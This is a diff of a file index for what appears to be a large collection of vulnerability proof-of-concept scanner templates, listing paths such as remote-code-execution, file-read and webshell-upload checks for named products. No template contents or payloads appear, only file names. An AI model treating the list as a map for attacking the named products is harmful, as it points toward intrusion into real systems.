./poc/other/advance-menu-manager-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/advance-menu-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/advance-setup-119.yaml +./poc/other/advance-setup-120.yaml ./poc/other/advance-setup-121.yaml ./poc/other/advance-setup-122.yaml ./poc/other/advance-setup-123.yaml -./poc/other/advance-setup.yaml ./poc/other/advanced-access-manager-b637b9c54c67878356ef9c9f8b351288.yaml ./poc/other/advanced-access-manager-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/advanced-access-manager-ea2663800436129993edd6a6efcfbd38.yaml @@ -35320,9 +35343,9 @@ ./poc/other/alibaba_canal.yaml ./poc/other/alienspy-malware.yaml ./poc/other/alienvault-usm-271.yaml +./poc/other/alienvault-usm-272.yaml ./poc/other/alienvault-usm-273.yaml ./poc/other/alienvault-usm-274.yaml -./poc/other/alienvault-usm.yaml ./poc/other/alik.yaml ./poc/other/alina-malware.yaml ./poc/other/aliyun-rds.yaml @@ -35421,7 +35444,7 @@ ./poc/other/ampps-dirlisting.yaml ./poc/other/ampps-panel-309.yaml ./poc/other/ampps-panel-310.yaml -./poc/other/ampps-panel.yaml +./poc/other/ampps-panel-311.yaml ./poc/other/analytics-counter-5f22e6f8c903370beb0ac4fd204c0e91.yaml ./poc/other/analytics-counter-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/analytics-counter-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -35440,6 +35463,7 @@ ./poc/other/animeplanet.yaml ./poc/other/anmai-system.yaml ./poc/other/anneca-intouch-crm.yaml +./poc/other/anni-filedownload.yaml ./poc/other/annonces-701e42d4ac1d386a1411ece3c4c8616b.yaml ./poc/other/annonces-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/annonces-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -35475,6 +35499,7 @@ ./poc/other/anydesk-phish.yaml ./poc/other/anymacro-邮件系统.yaml ./poc/other/aolansoft-studentsystem.yaml +./poc/other/aolynkbr304-weakpass.yaml ./poc/other/ap0calypse-malware.yaml ./poc/other/apc-info-1.yaml ./poc/other/apc-info-2.yaml @@ -35682,8 +35707,8 @@ ./poc/other/automatic-domain-changer-75b95c1cb64e1f8065e2c00a9a20be2a.yaml ./poc/other/automatic-domain-changer-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/automatic-domain-changer-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/other/automation-direct-596.yaml ./poc/other/automation-direct-597.yaml +./poc/other/automation-direct.yaml ./poc/other/automatisch-panel.yaml ./poc/other/autoptimize-2ecfdf7e957d875bca93a4c9bd866fc9.yaml ./poc/other/autoptimize-74dc24688d78ed794be256c0d98a2a2b.yaml @@ -35785,6 +35810,7 @@ ./poc/other/baggage-freight-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/baggage-freight-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/baidu-subaidu.yaml +./poc/other/bak.yaml ./poc/other/bandcamp.yaml ./poc/other/bandlab.yaml ./poc/other/bandook-malware.yaml @@ -35797,8 +35823,8 @@ ./poc/other/barelycorporate-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/barelycorporate-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/barracuda-panel-684.yaml -./poc/other/barracuda-panel-685.yaml ./poc/other/barracuda-panel-686.yaml +./poc/other/barracuda-panel.yaml ./poc/other/barracuda-ssl-vpn.yaml ./poc/other/base64_strings.yaml ./poc/other/baseurl.yaml @@ -35876,7 +35902,6 @@ ./poc/other/bigip-pwner-workflow.yaml ./poc/other/bigip-rest-panel.yaml ./poc/other/bigip-workflow.yaml -./poc/other/bigip.yaml ./poc/other/bigo-live.yaml ./poc/other/bikemap.yaml ./poc/other/bilin-uag系列网关.yaml @@ -35914,7 +35939,6 @@ ./poc/other/bitrix-registration.yaml ./poc/other/bitrix-site-manager.yaml ./poc/other/bitrix-workflow.yaml -./poc/other/bitrix_bak_check.yaml ./poc/other/bitrix_content_spoofing_ajax.yaml ./poc/other/bitrix_content_spoofing_imagepg.yaml ./poc/other/bittube.yaml @@ -36009,8 +36033,8 @@ ./poc/other/bookshelf-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/bookshelf-eaad218b0d61ef19d3c783667bf8b3ea.yaml ./poc/other/bookshelf-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/other/bookstack-panel-766.yaml ./poc/other/bookstack-panel-767.yaml -./poc/other/bookstack-panel.yaml ./poc/other/boosty.yaml ./poc/other/booth.yaml ./poc/other/bootstrap-admin-panel-template.yaml @@ -36218,22 +36242,22 @@ ./poc/other/cache-poisoning-821.yaml ./poc/other/cache-poisoning-822.yaml ./poc/other/cache-poisoning-823.yaml +./poc/other/cache-poisoning-824.yaml ./poc/other/cache-poisoning-825.yaml -./poc/other/cache-poisoning.yaml ./poc/other/cache-purge.yml ./poc/other/cache_piossing.yaml ./poc/other/cachecloud.yaml ./poc/other/cachethq.yaml ./poc/other/cacti-WeakPass.yaml ./poc/other/cacti-cacti-info.yaml +./poc/other/cacti-panel-828.yaml ./poc/other/cacti-panel-829.yaml -./poc/other/cacti-panel.yaml ./poc/other/cacti-weathermap-file-write-1.yaml ./poc/other/cacti-weathermap-file-write-2.yaml ./poc/other/cacti-weathermap-file-write-830.yaml ./poc/other/cacti-weathermap-file-write-831.yaml ./poc/other/cacti-weathermap-file-write-832.yaml -./poc/other/cacti-weathermap-file-write.yaml +./poc/other/cacti-weathermap-file-write-833.yaml ./poc/other/cacti-weathermap-file-write.yml ./poc/other/cacti-workflow-834.yaml ./poc/other/cacti-workflow.yaml @@ -36261,13 +36285,13 @@ ./poc/other/campaignmonitor-841.yaml ./poc/other/campaignmonitor-842.yaml ./poc/other/campaignmonitor-843.yaml -./poc/other/campaignmonitor-844.yaml +./poc/other/campaignmonitor.yaml ./poc/other/campsite.yaml ./poc/other/campus-card-management-system.yaml ./poc/other/campus-directory-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/campus-directory-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/can-i-take-over-dns-852.yaml -./poc/other/can-i-take-over-dns.yaml +./poc/other/can-i-take-over-dns-853.yaml ./poc/other/canal-admin.yaml ./poc/other/cancosoft-asset-management.yaml ./poc/other/canvas-1497650f3b2e1de89a575d8c543762a8.yaml @@ -36334,6 +36358,7 @@ ./poc/other/casdoor.yaml ./poc/other/casemanager-panel.yaml ./poc/other/cashapp.yaml +./poc/other/cassia-bluetooth-gateway-panel.yaml ./poc/other/castingcallclub.yaml ./poc/other/catablog-bc42b348a752f465536d2011ff351646.yaml ./poc/other/catablog-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -36438,7 +36463,7 @@ ./poc/other/checkmarx-panel.yaml ./poc/other/checkpoint-panel-1.yaml ./poc/other/checkpoint-panel-2.yaml -./poc/other/checkpoint-panel-898.yaml +./poc/other/checkpoint-panel-899.yaml ./poc/other/checkpoint-panel.yaml ./poc/other/checkpoint-workflow.yaml ./poc/other/cheezburger.yaml @@ -36553,9 +36578,9 @@ ./poc/other/client-portal-bb6ddd01a39f69c74ba724f04b84b268.yaml ./poc/other/client-portal-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/client-portal-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/other/clientaccesspolicy-1005.yaml ./poc/other/clientaccesspolicy-1006.yaml ./poc/other/clientaccesspolicy-1007.yaml +./poc/other/clientaccesspolicy.yaml ./poc/other/clientexec.yaml ./poc/other/clientmesh-malware.yaml ./poc/other/climatejusticerocks-mastodon-instance.yaml @@ -36581,8 +36606,8 @@ ./poc/other/cloudinary-1026.yaml ./poc/other/cloudinary-1027.yaml ./poc/other/cloudinary.yaml -./poc/other/cloudphysician-radar-1028.yaml ./poc/other/cloudphysician-radar-1029.yaml +./poc/other/cloudphysician-radar.yaml ./poc/other/cloudpress-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/cloudpress-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/cloudroom-meeting.yaml @@ -36607,7 +36632,7 @@ ./poc/other/cmp-coming-soon-maintenance-10ac1acbc5f0af2c85b0edc68763f90e.yaml ./poc/other/cmp-coming-soon-maintenance-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/cmyee-momentopress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/other/cname-fingerprint-1030.yaml +./poc/other/cname-fingerprint.yaml ./poc/other/cname-provider-assessment.yaml ./poc/other/cname-service.yaml ./poc/other/cnet.yaml @@ -36964,8 +36989,8 @@ ./poc/other/crontab-ui.yaml ./poc/other/cross-origin-embedder-policy.yaml ./poc/other/cross-origin-opener-policy.yaml +./poc/other/crossdomain-xml-1267.yaml ./poc/other/crossdomain-xml-1268.yaml -./poc/other/crossdomain-xml-1269.yaml ./poc/other/crossdomain-xml.yaml ./poc/other/crossdomin-xml.yaml ./poc/other/crowdin.yaml @@ -36984,7 +37009,7 @@ ./poc/other/csod-panel-1286.yaml ./poc/other/csod-panel-1287.yaml ./poc/other/csod-panel-1288.yaml -./poc/other/csod-panel-1289.yaml +./poc/other/csod-panel.yaml ./poc/other/csp-bypass.yaml ./poc/other/cspp-bracket-firstparam.yaml ./poc/other/cspp-bracket.yaml @@ -37158,7 +37183,7 @@ ./poc/other/deep-blue-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/deeper-comments-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/deezer-phish.yaml -./poc/other/defectdojo-panel-6916.yaml +./poc/other/defectdojo-panel.yaml ./poc/other/deimos-c2.yaml ./poc/other/dejavu-9449ef76879953c9ac6d19c4c293def1.yaml ./poc/other/dejavu-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -37234,7 +37259,7 @@ ./poc/other/dialogs-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/diamondfox-malware.yaml ./poc/other/dian-diagnostics.yaml -./poc/other/diaowen-fileread.yaml +./poc/other/diaowen-fileread(1).yaml ./poc/other/diaowen-system.yaml ./poc/other/diary-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/diary-theme-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -37409,7 +37434,7 @@ ./poc/other/druid-monitor-7101.yaml ./poc/other/druid-monitor-7102.yaml ./poc/other/druid-monitor-7103.yaml -./poc/other/druid-monitor-7104.yaml +./poc/other/druid-monitor.yaml ./poc/other/druid-panel.yaml ./poc/other/drum.yaml ./poc/other/ds-store-file.yaml @@ -37473,7 +37498,7 @@ ./poc/other/dx-delete-attached-media-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/dxplanning-panel.yaml ./poc/other/dynamic-broadcast-receiver-7140.yaml -./poc/other/dynamic-broadcast-receiver.yaml +./poc/other/dynamic-broadcast-receiver-7142.yaml ./poc/other/dynamic-visibility-for-elementor-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/dynamic-widgets-ccfd20386a92ddec51edd8a4a3d96f3f.yaml ./poc/other/dynamic-widgets-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -38125,7 +38150,7 @@ ./poc/other/figma.yaml ./poc/other/file-manager-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/file-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/other/file-scheme-7467.yaml +./poc/other/file-scheme-7468.yaml ./poc/other/file-scheme-7469.yaml ./poc/other/file-scheme.yaml ./poc/other/filemaker.yaml @@ -38164,9 +38189,9 @@ ./poc/other/finereport-workflow.yaml ./poc/other/finereport.yaml ./poc/other/fiori-launchpad.yaml -./poc/other/fiorilaunchpad-logon-7482.yaml ./poc/other/fiorilaunchpad-logon-7483.yaml ./poc/other/fiorilaunchpad-logon-7484.yaml +./poc/other/fiorilaunchpad-logon.yaml ./poc/other/firebase-messaging.yaml ./poc/other/firebase-urls-7497.yaml ./poc/other/firebase-urls-7498.yaml @@ -38414,6 +38439,7 @@ ./poc/other/front-end-only-users-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/froxlor-management-panel.yaml ./poc/other/frp.yaml +./poc/other/frserver-listdir.yaml ./poc/other/fruitful-018ac6fe17e1f7369ac344b4e390b42f.yaml ./poc/other/fruitful-30814c3d4dcd5380c865f11089a748d7.yaml ./poc/other/fruitful-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -38539,6 +38565,7 @@ ./poc/other/get-custom-field-values-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/get-env.yaml ./poc/other/get-iam-users.yaml +./poc/other/get-override-sni.yaml ./poc/other/get-query-string.yaml ./poc/other/get-sni-unsafe.yaml ./poc/other/get-sni.yaml @@ -38627,7 +38654,7 @@ ./poc/other/gogs-panel.yaml ./poc/other/gogs-workflow-7760.yaml ./poc/other/gogs.yaml -./poc/other/golang-metrics.yaml +./poc/other/golang-metrics-7765.yaml ./poc/other/golangci-lint.yml ./poc/other/goldencis-nacp.yaml ./poc/other/goldlib-library.yaml @@ -38873,10 +38900,10 @@ ./poc/other/hispider-router.yaml ./poc/other/hitachi-maintenance-utility.yaml ./poc/other/hitachi-virtual-storage-platform.yaml -./poc/other/hitron-technologies-7959.yaml ./poc/other/hitron-technologies-7960.yaml ./poc/other/hitron-technologies-7961.yaml ./poc/other/hitron-technologies-7962.yaml +./poc/other/hitron-technologies.yaml ./poc/other/hivemail.yaml ./poc/other/hjtcloud-arbitrary-file-read-1.yaml ./poc/other/hjtcloud-arbitrary-file-read-2.yaml @@ -38896,7 +38923,7 @@ ./poc/other/hmc-hybris-panel-1.yaml ./poc/other/hmc-hybris-panel-2.yaml ./poc/other/hmc-hybris-panel-7977.yaml -./poc/other/hmc-hybris-panel.yaml +./poc/other/hmc-hybris-panel-7978.yaml ./poc/other/hmc.yaml ./poc/other/hmo.yaml ./poc/other/hnjycy.yaml @@ -38977,7 +39004,7 @@ ./poc/other/hqtheme-extra-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/hreflang-manager-lite-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/hsort-fileread.yaml -./poc/other/hst-fileRead.yaml +./poc/other/hst-fileread.yaml ./poc/other/ht-builder-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/ht-builder-dcc71502feecb57aedaad79259c08737.yaml ./poc/other/ht-builder-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -39003,8 +39030,8 @@ ./poc/other/huawei-hg532e-panel-8065.yaml ./poc/other/huawei-hg532e-panel-8066.yaml ./poc/other/huawei-hg532e-panel.yaml -./poc/other/huawei-home-gateway-8072.yaml ./poc/other/huawei-home-gateway-hg659-fileread.yml +./poc/other/huawei-home-gateway.yaml ./poc/other/huawei-ivs.yaml ./poc/other/huawei-jump-server.yaml ./poc/other/huawei-netopen.yaml @@ -39099,9 +39126,9 @@ ./poc/other/iiop.yaml ./poc/other/iis-directory-listing.yaml ./poc/other/iis-put-getshell.yml +./poc/other/iis-shortname-8151.yaml ./poc/other/iis-shortname-8153.yaml ./poc/other/iis-shortname.yaml -./poc/other/iis.yaml ./poc/other/ikonboard.yaml ./poc/other/ikuai8-cloud.yaml ./poc/other/ilas.yaml @@ -39268,8 +39295,8 @@ ./poc/other/interlib-fileread-8171.yaml ./poc/other/interlib-fileread-8172.yaml ./poc/other/interlib-fileread-8173.yaml +./poc/other/interlib-fileread-8174.yaml ./poc/other/interlib-fileread-8175.yaml -./poc/other/interlib-fileread.yaml ./poc/other/internet-archive-account.yaml ./poc/other/internet-cluster-manager.yaml ./poc/other/internet-service-8176.yaml @@ -39687,7 +39714,7 @@ ./poc/other/landray-oa-fileread-2.yaml ./poc/other/landray-oa-fileread-8569.yaml ./poc/other/landray-oa-fileread-8570.yaml -./poc/other/landray-oa-fileread-8571.yaml +./poc/other/landray-oa-fileread.yaml ./poc/other/landray-oa-panel.yaml ./poc/other/landray-oa.yaml ./poc/other/landray-蓝凌eis智慧协同平台.yaml @@ -40534,9 +40561,9 @@ ./poc/other/mobilechief-mobile-site-creator-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/mobilechief-mobile-site-creator-f89525d14e39b3d540799cc7acebf38e.yaml ./poc/other/mobilechief-mobile-site-creator-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/other/mobileiron(1).yaml ./poc/other/mobileiron-mdm.yaml ./poc/other/mobileiron-workflow.yaml -./poc/other/mobileiron.yaml ./poc/other/mobilityguard.yaml ./poc/other/mobilook-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/mobilook-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -40802,7 +40829,6 @@ ./poc/other/netshare-vpn.yaml ./poc/other/netsoft-eida.yaml ./poc/other/netsparker-panel.yaml -./poc/other/netsurveillance-fileread.yaml ./poc/other/netsweeper-workflow.yaml ./poc/other/netsweeper.yaml ./poc/other/nette-workflow.yaml @@ -41091,7 +41117,7 @@ ./poc/other/open-proxy-internal.yaml ./poc/other/open-proxy-localhost-9291.yaml ./poc/other/open-proxy-localhost-9292.yaml -./poc/other/open-proxy-localhost-9293.yaml +./poc/other/open-proxy-localhost.yaml ./poc/other/open-proxy-portscan-9294.yaml ./poc/other/open-proxy-portscan-9295.yaml ./poc/other/open-proxy-portscan-9296.yaml @@ -41131,8 +41157,8 @@ ./poc/other/openredir-check.yaml ./poc/other/openshift-installer-panel.yaml ./poc/other/opensis-panel.yaml -./poc/other/opensis-workflow-9318.yaml ./poc/other/opensis-workflow-9319.yaml +./poc/other/opensis-workflow.yaml ./poc/other/opensns-workflow.yaml ./poc/other/openssl.yaml ./poc/other/openstreetmap.yaml @@ -41185,8 +41211,8 @@ ./poc/other/osticket-panel.yaml ./poc/other/osticket.yaml ./poc/other/osu.yaml +./poc/other/otobo-panel-9412.yaml ./poc/other/otobo-panel-9413.yaml -./poc/other/otobo-panel.yaml ./poc/other/otter-blocks.yaml ./poc/other/our-freedom-book.yaml ./poc/other/our-services-showcase-54868147f513b6a0789b0ead83eeadcd.yaml @@ -41387,7 +41413,7 @@ ./poc/other/phonenumber.yaml ./poc/other/phonix-pacs.yaml ./poc/other/phoronix-pane.yaml -./poc/other/phoronix-pane;.yaml +./poc/other/phoronix-panel.yaml ./poc/other/phorum.yaml ./poc/other/photo-gallery-225718d20d9a457bb9952f65e83842a3.yaml ./poc/other/photo-gallery-5fc50bb479b39e7c97fd50f2df5ca86f.yaml @@ -41800,6 +41826,7 @@ ./poc/other/pt-elementor-addons-lite-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/ptr-fingerprint-9707.yaml ./poc/other/ptr-fingerprint.yaml +./poc/other/ptr.yaml ./poc/other/public-documents.yaml ./poc/other/public-security-checkpoint-document-verification-system.yaml ./poc/other/public.yaml @@ -41930,7 +41957,7 @@ ./poc/other/qyrr-code-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/qz-safe-mail.yaml ./poc/other/r-seenet-workflow.yaml -./poc/other/race-multiple.yaml +./poc/other/race-simple.yaml ./poc/other/rack-mini-profiler-9788.yaml ./poc/other/rack-mini-profiler-9789.yaml ./poc/other/rack-mini-profiler-9790.yaml @@ -41978,7 +42005,6 @@ ./poc/other/rating-widget-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/rating-widget-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/raw-get-query.yaml -./poc/other/raw-get.yaml ./poc/other/raw-path-trailing-slash.yaml ./poc/other/raw-payload.yaml ./poc/other/raw-post-body.yaml @@ -42272,8 +42298,8 @@ ./poc/other/ruijie-EG-fileDown.yaml ./poc/other/ruijie-cloud.yaml ./poc/other/ruijie-eg-file-read.yml -./poc/other/ruijie-eg-filedown.yaml ./poc/other/ruijie-eg-info-leak.yml +./poc/other/ruijie-eg-passleak.yaml ./poc/other/ruijie-eg易网关.yaml ./poc/other/ruijie-it.yaml ./poc/other/ruijie-rg-uac-infoleak.yaml @@ -42778,11 +42804,13 @@ ./poc/other/sitecore-version-10291.yaml ./poc/other/sitecore-version-10292.yaml ./poc/other/sitecore-version.yaml -./poc/other/sitecore-workflow-10293.yaml ./poc/other/sitecore-workflow-10294.yaml +./poc/other/sitecore-workflow.yaml +./poc/other/sitecore.yaml ./poc/other/siteengine.yaml ./poc/other/sitegenius.yaml ./poc/other/siteguard.yaml +./poc/other/sitemap.yaml ./poc/other/siteminderagent.yaml ./poc/other/siteorigin-panels-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/siteorigin-panels-fde24c983d6f7b8e7fbe94a338f8192b.yaml @@ -43350,7 +43378,7 @@ ./poc/other/tabletoptournament.yaml ./poc/other/tabnabbing-check-10644.yaml ./poc/other/tabnabbing-check-10645.yaml -./poc/other/tabnabbing-check.yaml +./poc/other/tabnabbing-check-10646.yaml ./poc/other/tag-groups-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/tag-groups-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/taggator-3732e630abf4e60d3e99b6be8bbcda41.yaml @@ -43437,7 +43465,6 @@ ./poc/other/tencentcloud-cos-890c0ea519f21a97e27c9f7752d595e3.yaml ./poc/other/tencentcloud-cos-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/tencentcloud-cos-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml -./poc/other/tenda-leakage.yaml ./poc/other/tenda-panel.yaml ./poc/other/tengweioa.yaml ./poc/other/tenor.yaml @@ -43455,7 +43482,7 @@ ./poc/other/terminal-feature-collection-and-control-system.yaml ./poc/other/terraform-enterprise-panel-10710.yaml ./poc/other/terraform-enterprise-panel-10711.yaml -./poc/other/terraform-enterprise-panel-10712.yaml +./poc/other/terraform-enterprise-panel.yaml ./poc/other/terramaster-workflow.yaml ./poc/other/teslamate.yaml ./poc/other/test.yaml @@ -43534,7 +43561,6 @@ ./poc/other/thinkcmf-workflow.yaml ./poc/other/thinkcmf-write-shell.yml ./poc/other/thinkcmf.yaml -./poc/other/thinkcmf_include.yaml ./poc/other/thinker-intelligentgateway.yaml ./poc/other/thinkmail.yaml ./poc/other/thinkox.yaml @@ -44774,6 +44800,7 @@ ./poc/other/yml-for-yandex-market-f4f7110eac52dea3f609dd027787a854.yaml ./poc/other/yongyou-ELTextFile.yaml ./poc/other/yongyou-changjietong-EFI.yaml +./poc/other/yongyou-eltextfile.yaml ./poc/other/yonyou-chanjet-tplus-downloadproxy-filedownload.yaml ./poc/other/yonyou-chanjet-tplus-getdecallusers-infoleak.yaml ./poc/other/yonyou-chanjet-tplus-read-file.yaml @@ -45441,11 +45468,11 @@ ./poc/php/phpok-sqli.yml ./poc/php/phpok.yaml ./poc/php/phpopenchat.yaml -./poc/php/phppgadmin-panel-9539.yaml ./poc/php/phppgadmin-panel-9540.yaml ./poc/php/phppgadmin-panel-9541.yaml ./poc/php/phppgadmin-panel-9542.yaml ./poc/php/phppgadmin-panel-9543.yaml +./poc/php/phppgadmin-panel.yaml ./poc/php/phppgadmin-version.yaml ./poc/php/phppgadmin-workflow.yaml ./poc/php/phppgadmin.yaml @@ -45600,10 +45627,10 @@ ./poc/python/autobahn-python-detect-593.yaml ./poc/python/autobahn-python-detect-594.yaml ./poc/python/autobahn-python-detect.yaml -./poc/python/default-django-page-6840.yaml ./poc/python/default-django-page-6841.yaml ./poc/python/default-django-page-6842.yaml ./poc/python/default-django-page-6843.yaml +./poc/python/default-django-page.yaml ./poc/python/django-admin-panel-7021.yaml ./poc/python/django-admin-panel-7022.yaml ./poc/python/django-admin-panel-7023.yaml @@ -45697,7 +45724,6 @@ ./poc/remote_code_execution/ApPHP-MicroBlog-rce.yaml ./poc/remote_code_execution/Apache-NiFi-rce.yaml ./poc/remote_code_execution/Apache-Ofbiz-XML-RPC-RCE.yaml -./poc/remote_code_execution/Apereo-Cas-rce.yaml ./poc/remote_code_execution/Assetnote_RCE.yaml ./poc/remote_code_execution/Bo-Blog-go-rce.yaml ./poc/remote_code_execution/CVE-2018-1000861-jenkins-rce.yaml @@ -45715,6 +45741,7 @@ ./poc/remote_code_execution/Hashicorp Consul-RCE-2.yaml ./poc/remote_code_execution/Hikvision_applyCT_RCE.yaml ./poc/remote_code_execution/Jupyter-Notebook-Unauthorized-Access-Rce.yaml +./poc/remote_code_execution/Kingsoft-rce.yaml ./poc/remote_code_execution/Landray OA treexml.tmpl Script RCE.yaml ./poc/remote_code_execution/M1Server-rce.yaml ./poc/remote_code_execution/Metabase_validate_RCE.yaml @@ -45727,6 +45754,7 @@ ./poc/remote_code_execution/RocketMQ-Configuration_Override-RCE.yaml ./poc/remote_code_execution/SAP-NetWeaver-rce.yaml ./poc/remote_code_execution/SPON-IP-rce.yaml +./poc/remote_code_execution/Seagate-media-rce.yaml ./poc/remote_code_execution/Shellshock-RCE-1.yaml ./poc/remote_code_execution/SpiderFlow-Save-Rce.yaml ./poc/remote_code_execution/SpringBoot-H2db-Rce.yaml @@ -45793,6 +45821,7 @@ ./poc/remote_code_execution/apache-spark-shell-rce.yaml ./poc/remote_code_execution/apache-struts-s2-016-rce.yaml ./poc/remote_code_execution/apachestruts-rce.yaml +./poc/remote_code_execution/apereo-cas-rce.yaml ./poc/remote_code_execution/api-vercel-510.yaml ./poc/remote_code_execution/api-vercel.yaml ./poc/remote_code_execution/avaya-aura-rce.yaml @@ -46021,11 +46050,11 @@ ./poc/remote_code_execution/force-regenerate-thumbnails.yaml ./poc/remote_code_execution/forcefield-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/forcefield-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/remote_code_execution/forcepoint-7529.yaml ./poc/remote_code_execution/forcepoint-7530.yaml +./poc/remote_code_execution/forcepoint-applicance-7527.yaml ./poc/remote_code_execution/forcepoint-applicance-7528.yaml -./poc/remote_code_execution/forcepoint-applicance.yaml ./poc/remote_code_execution/forcepoint-websense-email-security-gateway.yaml -./poc/remote_code_execution/forcepoint.yaml ./poc/remote_code_execution/geovision-rce.yaml ./poc/remote_code_execution/git-submodule-rce.yaml ./poc/remote_code_execution/gitea-rce.yaml @@ -46076,7 +46105,7 @@ ./poc/remote_code_execution/icewarp-webclient-rce-8130.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8131.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8132.yaml -./poc/remote_code_execution/icewarp-webclient-rce.yaml +./poc/remote_code_execution/icewarp-webclient-rce-8133.yaml ./poc/remote_code_execution/imo-get-file-rce.yaml ./poc/remote_code_execution/import-woocommerce-095fc39d2fec00ef5f77d197f7a50ae0.yaml ./poc/remote_code_execution/import-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -46089,7 +46118,7 @@ ./poc/remote_code_execution/jamf-log4j-jndi-rce-8211.yaml ./poc/remote_code_execution/jamf-log4j-jndi-rce-8212.yaml ./poc/remote_code_execution/jamf-log4j-jndi-rce-8213.yaml -./poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml +./poc/remote_code_execution/jamf-log4j-jndi-rce.yaml ./poc/remote_code_execution/jamf-pro-log4j-rce.yaml ./poc/remote_code_execution/jeewms-dynamicDataSourceController-rce.yaml ./poc/remote_code_execution/jenkins-cve-2018-1000861-rce.yml @@ -46111,7 +46140,6 @@ ./poc/remote_code_execution/kadence-woocommerce-email-designer-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/kindee-cloudRce.yaml ./poc/remote_code_execution/kingdee-erp-getbusinessobjectdata-rce.yaml -./poc/remote_code_execution/kingsoft-rce.yaml ./poc/remote_code_execution/kingsoft-v8-rce.yaml ./poc/remote_code_execution/klarna-checkout-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/klarna-checkout-for-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -46151,7 +46179,7 @@ ./poc/remote_code_execution/lotuscms-rce-8650.yaml ./poc/remote_code_execution/lotuscms-rce-8651.yaml ./poc/remote_code_execution/lotuscms-rce-8652.yaml -./poc/remote_code_execution/lotuscms-rce.yaml +./poc/remote_code_execution/lotuscms-rce-8653.yaml ./poc/remote_code_execution/maccms-rce.yml ./poc/remote_code_execution/maian-cart-preauth-rce-8720.yaml ./poc/remote_code_execution/maian-cart-preauth-rce-8721.yaml @@ -46161,7 +46189,7 @@ ./poc/remote_code_execution/mcafee-epo-rce-8791.yaml ./poc/remote_code_execution/mcafee-epo-rce-8792.yaml ./poc/remote_code_execution/mcafee-epo-rce-8793.yaml -./poc/remote_code_execution/mcafee-epo-rce-8794.yaml +./poc/remote_code_execution/mcafee-epo-rce.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8835.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8836.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8837.yaml @@ -46399,9 +46427,9 @@ ./poc/remote_code_execution/sangfor-BA-rce.yaml ./poc/remote_code_execution/sangfor-ad-login-rce.yaml ./poc/remote_code_execution/sangfor-ad-rce.yaml +./poc/remote_code_execution/sangfor-ba-rce(1).yaml ./poc/remote_code_execution/sangfor-ba-rce-10020.yaml ./poc/remote_code_execution/sangfor-ba-rce-10021.yaml -./poc/remote_code_execution/sangfor-ba-rce.yaml ./poc/remote_code_execution/sangfor-ba-rce.yml ./poc/remote_code_execution/sangfor-edr-cssp-rce.yml ./poc/remote_code_execution/sangfor-edr-rce-10025.yaml @@ -46432,7 +46460,6 @@ 